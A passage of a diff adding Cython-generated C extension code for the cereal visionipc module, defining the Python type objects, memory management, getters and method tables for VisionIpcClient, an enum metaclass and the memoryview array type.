PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyObject *__pyx_tp_new_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient(PyTypeObject *t, PyObject *a, PyObject *k) { + struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)o); + new((void*)&(p->extra)) struct VisionIpcBufExtra(); + if (unlikely(__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_1__cinit__(o, a, k) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +static void __pyx_tp_dealloc_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient(PyObject *o) { + struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *p = (struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_3__dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + __Pyx_call_destructor(p->extra); + (*Py_TYPE(o)->tp_free)(o); +} + +static PyObject *__pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_width(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5width_1__get__(o); +} + +static PyObject *__pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_height(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_6height_1__get__(o); +} + +static PyObject *__pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_stride(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_6stride_1__get__(o); +} + +static PyObject *__pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_uv_offset(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_9uv_offset_1__get__(o); +} + +static PyObject *__pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_rgb(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_3rgb_1__get__(o); +} + +static PyObject *__pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_buffer_len(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_10buffer_len_1__get__(o); +} + +static PyObject *__pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_num_buffers(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_11num_buffers_1__get__(o); +} + +static PyObject *__pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_frame_id(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_8frame_id_1__get__(o); +} + +static PyObject *__pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_timestamp_sof(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13timestamp_sof_1__get__(o); +} + +static PyObject *__pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_timestamp_eof(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13timestamp_eof_1__get__(o); +} + +static PyObject *__pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_valid(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5valid_1__get__(o); +} + +static PyMethodDef __pyx_methods_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient[] = { + {"recv", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5recv, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"connect", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_7connect, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"is_connected", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_9is_connected, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"available_streams", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_11available_streams, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_15__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; + +static struct PyGetSetDef __pyx_getsets_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient[] = { + {(char *)"width", __pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_width, 0, (char *)0, 0}, + {(char *)"height", __pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_height, 0, (char *)0, 0}, + {(char *)"stride", __pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_stride, 0, (char *)0, 0}, + {(char *)"uv_offset", __pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_uv_offset, 0, (char *)0, 0}, + {(char *)"rgb", __pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_rgb, 0, (char *)0, 0}, + {(char *)"buffer_len", __pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_buffer_len, 0, (char *)0, 0}, + {(char *)"num_buffers", __pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_num_buffers, 0, (char *)0, 0}, + {(char *)"frame_id", __pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_frame_id, 0, (char *)0, 0}, + {(char *)"timestamp_sof", __pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_timestamp_sof, 0, (char *)0, 0}, + {(char *)"timestamp_eof", __pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_timestamp_eof, 0, (char *)0, 0}, + {(char *)"valid", __pyx_getprop_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_valid, 0, (char *)0, 0}, + {0, 0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient}, + {Py_tp_methods, (void *)__pyx_methods_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient}, + {Py_tp_getset, (void *)__pyx_getsets_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient}, + {Py_tp_new, (void *)__pyx_tp_new_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient}, + {0, 0}, +}; +static PyType_Spec __pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient_spec = { + "cereal.visionipc.visionipc_pyx.VisionIpcClient", + sizeof(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, + __pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient_slots, +}; +#else + +static PyTypeObject __pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient = { + PyVarObject_HEAD_INIT(0, 0) + "cereal.visionipc.visionipc_pyx.""VisionIpcClient", /*tp_name*/ + sizeof(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, /*tp_flags*/ + 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient, /*tp_methods*/ + 0, /*tp_members*/ + __pyx_getsets_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static int __pyx_tp_traverse___Pyx_EnumMeta(PyObject *o, visitproc v, void *a) { + int e; + if (!(&PyType_Type)->tp_traverse); else { e = (&PyType_Type)->tp_traverse(o,v,a); if (e) return e; } + return 0; +} + +static int __pyx_tp_clear___Pyx_EnumMeta(PyObject *o) { + if (!(&PyType_Type)->tp_clear); else (&PyType_Type)->tp_clear(o); + return 0; +} +static PyObject *__pyx_sq_item___Pyx_EnumMeta(PyObject *o, Py_ssize_t i) { + PyObject *r; + PyObject *x = PyInt_FromSsize_t(i); if(!x) return 0; + r = Py_TYPE(o)->tp_as_mapping->mp_subscript(o, x); + Py_DECREF(x); + return r; +} + +static PyMethodDef __pyx_methods___Pyx_EnumMeta[] = { + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_EnumMeta_7__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_EnumMeta_9__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __Pyx_EnumMeta_slots[] = { + {Py_sq_item, (void *)__pyx_sq_item___Pyx_EnumMeta}, + {Py_mp_subscript, (void *)__pyx_pw_8EnumBase_14__Pyx_EnumMeta_5__getitem__}, + {Py_tp_traverse, (void *)__pyx_tp_traverse___Pyx_EnumMeta}, + {Py_tp_clear, (void *)__pyx_tp_clear___Pyx_EnumMeta}, + {Py_tp_iter, (void *)__pyx_pw_8EnumBase_14__Pyx_EnumMeta_3__iter__}, + {Py_tp_methods, (void *)__pyx_methods___Pyx_EnumMeta}, + {Py_tp_init, (void *)__pyx_pw_8EnumBase_14__Pyx_EnumMeta_1__init__}, + {0, 0}, +}; +static PyType_Spec __Pyx_EnumMeta_spec = { + "cereal.visionipc.visionipc_pyx.__Pyx_EnumMeta", + sizeof(struct __pyx_obj___Pyx_EnumMeta), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, + __Pyx_EnumMeta_slots, +}; +#else + +static PySequenceMethods __pyx_tp_as_sequence___Pyx_EnumMeta = { + 0, /*sq_length*/ + 0, /*sq_concat*/ + 0, /*sq_repeat*/ + __pyx_sq_item___Pyx_EnumMeta, /*sq_item*/ + 0, /*sq_slice*/ + 0, /*sq_ass_item*/ + 0, /*sq_ass_slice*/ + 0, /*sq_contains*/ + 0, /*sq_inplace_concat*/ + 0, /*sq_inplace_repeat*/ +}; + +static PyMappingMethods __pyx_tp_as_mapping___Pyx_EnumMeta = { + 0, /*mp_length*/ + __pyx_pw_8EnumBase_14__Pyx_EnumMeta_5__getitem__, /*mp_subscript*/ + 0, /*mp_ass_subscript*/ +}; + +static PyTypeObject __Pyx_EnumMeta = { + PyVarObject_HEAD_INIT(0, 0) + "cereal.visionipc.visionipc_pyx.""__Pyx_EnumMeta", /*tp_name*/ + sizeof(struct __pyx_obj___Pyx_EnumMeta), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + 0, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + &__pyx_tp_as_sequence___Pyx_EnumMeta, /*tp_as_sequence*/ + &__pyx_tp_as_mapping___Pyx_EnumMeta, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse___Pyx_EnumMeta, /*tp_traverse*/ + __pyx_tp_clear___Pyx_EnumMeta, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + __pyx_pw_8EnumBase_14__Pyx_EnumMeta_3__iter__, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods___Pyx_EnumMeta, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + __pyx_pw_8EnumBase_14__Pyx_EnumMeta_1__init__, /*tp_init*/ + 0, /*tp_alloc*/ + 0, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif +static struct __pyx_vtabstruct_array __pyx_vtable_array; + +static PyObject *__pyx_tp_new_array(PyTypeObject *t, PyObject *a, PyObject *k) { + struct __pyx_array_obj *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_array_obj *)o); + p->__pyx_vtab = __pyx_vtabptr_array; + p->mode = ((PyObject*)Py_None); Py_INCREF(Py_None); + p->_format = ((PyObject*)Py_None); Py_INCREF(Py_None); + if (unlikely(__pyx_array___cinit__(o, a, k) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +static void __pyx_tp_dealloc_array(PyObject *o) { + struct __pyx_array_obj *p = (struct __pyx_array_obj *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_array) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_array___dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + Py_CLEAR(p->mode); + Py_CLEAR(p->_format); + (*Py_TYPE(o)->tp_free)(o); +} +static PyObject *__pyx_sq_item_array(PyObject *o, Py_ssize_t i) { + PyObject *r; + PyObject *x = PyInt_FromSsize_t(i); if(!x) return 0; + r = Py_TYPE(o)->tp_as_mapping->mp_subscript(o, x); + Py_DECREF(x); + return r; +} + +static int __pyx_mp_ass_subscript_array(PyObject *o, PyObject *i, PyObject *v) { + if (v) { + return __pyx_array___setitem__(o, i, v); + } + else { + __Pyx_TypeName o_type_name; + o_type_name = __Pyx_PyType_GetName(Py_TYPE(o)); + PyErr_Format(PyExc_NotImplementedError, + "Subscript deletion not supported by " __Pyx_FMT_TYPENAME, o_type_name); + __Pyx_DECREF_TypeName(o_type_name); + return -1; + } +} + +static PyObject *__pyx_tp_getattro_array(PyObject *o, PyObject *n) { + PyObject *v = __Pyx_PyObject_GenericGetAttr(o, n); + if (!v && PyErr_ExceptionMatches(PyExc_AttributeError)) { + PyErr_Clear(); + v = __pyx_array___getattr__(o, n); + } + return v; +} + +static PyObject *__pyx_getprop___pyx_array_memview(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_5array_7memview_1__get__(o); +} + +static PyMethodDef __pyx_methods_array[] = { + {"__getattr__", (PyCFunction)__pyx_array___getattr__, METH_O|METH_COEXIST, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_array_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_array_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; + +static struct PyGetSetDef __pyx_getsets_array[] = { + {(char *)"memview", __pyx_getprop___pyx_array_memview, 0, (char *)0, 0}, + {0, 0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +#if !CYTHON_COMPILING_IN_LIMITED_API + +static PyBufferProcs __pyx_tp_as_buffer_array = { + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getreadbuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getwritebuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getsegcount*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getcharbuffer*/ + #endif + __pyx_array_getbuffer, /*bf_getbuffer*/ + 0, /*bf_releasebuffer*/ +}; +#endif +static PyType_Slot __pyx_type___pyx_array_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_array}, + {Py_sq_length, (void *)__pyx_array___len__}, + {Py_sq_item, (void *)__pyx_sq_item_array}, + {Py_mp_length, (void *)__pyx_array___len__}, + {Py_mp_subscript, (void *)__pyx_array___getitem__}, + {Py_mp_ass_subscript, (void *)__pyx_mp_ass_subscript_array}, + {Py_tp_getattro, (void *)__pyx_tp_getattro_array}, + #if defined(Py_bf_getbuffer) + {Py_bf_getbuffer, (void *)__pyx_array_getbuffer}, + #endif + {Py_tp_methods, (void *)__pyx_methods_array}, + {Py_tp_getset, (void *)__pyx_getsets_array}, + {Py_tp_new, (void *)__pyx_tp_new_array}, + {0, 0}, +}; +static PyType_Spec __pyx_type___pyx_array_spec = { + "cereal.visionipc.visionipc_pyx.array", + sizeof(struct __pyx_array_obj), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_SEQUENCE, + __pyx_type___pyx_array_slots, +}; +#else + +static PySequenceMethods __pyx_tp_as_sequence_array = { + __pyx_array___len__, /*sq_length*/ + 0, /*sq_concat*/ + 0, /*sq_repeat*/ + __pyx_sq_item_array, /*sq_item*/ + 0, /*sq_slice*/ + 0, /*sq_ass_item*/ + 0, /*sq_ass_slice*/ + 0, /*sq_contains*/ + 0, /*sq_inplace_concat*/ + 0, /*sq_inplace_repeat*/ +}; + +static PyMappingMethods __pyx_tp_as_mapping_array = { + __pyx_array___len__, /*mp_length*/ + __pyx_array___getitem__, /*mp_subscript*/ + __pyx_mp_ass_subscript_array, /*mp_ass_subscript*/ +}; + +static PyBufferProcs __pyx_tp_as_buffer_array = { + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getreadbuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getwritebuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getsegcount*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getcharbuffer*/ + #endif + __pyx_array_getbuffer, /*bf_getbuffer*/ + 0, /*bf_releasebuffer*/ +}; + +static PyTypeObject __pyx_type___pyx_array = { + PyVarObject_HEAD_INIT(0, 0) + "cereal.visionipc.visionipc_pyx.""array", /*tp_name*/ + sizeof(struct __pyx_array_obj), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_array, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + &__pyx_tp_as_sequence_array, /*tp_as_sequence*/ + &__pyx_tp_as_mapping_array, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + __pyx_tp_getattro_array, /*tp_getattro*/ + 0, /*tp_setattro*/ + &__pyx_tp_as_buffer_array, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_SEQUENCE, /*tp_flags*/ + 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_array, /*tp_methods*/ + 0, /*tp_members*/ + __pyx_getsets_array, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_array, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyObject *__pyx_tp_new_Enum(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + struct 